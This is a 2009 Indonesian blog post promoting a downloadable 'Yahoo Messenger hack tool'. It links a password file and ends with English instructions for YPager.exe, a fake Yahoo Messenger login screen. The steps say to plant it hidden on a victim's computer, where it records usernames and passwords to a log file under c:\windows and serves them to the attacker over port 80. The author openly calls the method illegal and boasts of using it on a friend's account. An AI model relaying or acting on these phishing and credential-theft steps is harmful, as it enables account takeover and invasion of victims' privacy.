Bluelol’s Blog

Just another WordPress.com weblog

HACK YAHOO MESSENGER?

apa sih maksudnya ?! Kata hack memang berkonotasi negatif. Memang, kali ini saya menemukan cara ilegal! HACK YAHOO MESSENGER atau EMAIL TEMAN anda atau orang lain. Yaitu masuk sebagai ID mereka. Kamu bisa mendapatkan sandi dan username mereka. Anda cukup mencari alamat emailnya lalu kita hack menggunakan TOOL yg saya dapatkan ini dari hacker handal di luar negeri sana. Bahkan, YMku sempat di hack dia. Sekarang intinya, anda maukah mendapatkan tool ini untuk me-hack ID YM orang lain? jangan boong deh..kita semua pasti mau! Tapi kita harus janji untuk tidak menggunakan tool ini untuk yang macam – macam. selanjutnya …

Tool ini jarang sekali terdapat di situs indonesia. Saya sudah cari kemana – mana tapi ga ketemu. Akhirnya ketemunya di situs hacker luar negri berbahasa Rusia. Masuk situs hacker harus hati hati, karena banyak virus dan spyware yang akan menyerang komputer kita. Harus menggunakan antivirus andalan untuk mengatasi virus yang menjangkiti komputer kita. Bahkan saya sendiri kewalahan akibat masuk ke situs itu karena banyak file yg hilang di komputerku dimakan virus. Tapi tenang saja, yang penting saya sudah mendapatkan tool atau program HACK yahoo messenger! itu yg penting…dan saya sudah coba ke ID email teman saya. Hasilnya? 100% berhasil…

TInggal anda bagaimana, bisa apa tidak mengoperasikannya. Kalo bingung, silahkan tanya melalui komentar dibawah ini. Semoga berhasil….

MAU DOWNLOAD TOOL / PROGRAMNYA????

klik link dibawah ini :

download tool hack yahoo for free

file diatas diproteksi dengan password. Passwordnya bisa kalian download via ziddu :

http://www.ziddu.com/download/3016274/passwordyahoohack.txt.html

klik alamat diatas untuk mendownload passwordnya.

terima kasih.

intruksi cara penggunaan :

Follow these instructions.

1> Place The filename “YPager.exe” any where on there system ( HINT: somewhere hidden ).

2> Open it up and get the user to login/ or wait untill they login. The program does the rest.

( You can use both physical and remote log file access to see what user/pass the user has entered.

You need to use an Internet Browser, like MSIE )

3>

< Physical Access >

There are 2 ways of doing this.

1. Viewing the RAW log file with note pad. The file with the recorded passwords is, c:\windows\yloginwin32.htm

NOTE: You will allso see c:\windows\YPager.exe allso exists just leave this here.

2. When you open the Fake Yahoo! Messenger Login Screen you will see a text box, with Search Yahoo! inside it,

just remove this text and type in  “c-cure”  without the quotes then hit search. This will show you all

recorded user/pass’s on the computer.

< Remote Access >

Connect to there machine on port 80 with an Internet browser. Type in there IP address into

it and just hit Enter. For example if the victims IP address was 127.0.0.1 you type in http://127.0.0.1 or

just 127.0.0.1.

5月 10, 2009 Posted by | HACK YAHOO MESSENGER? | コメントをどうぞ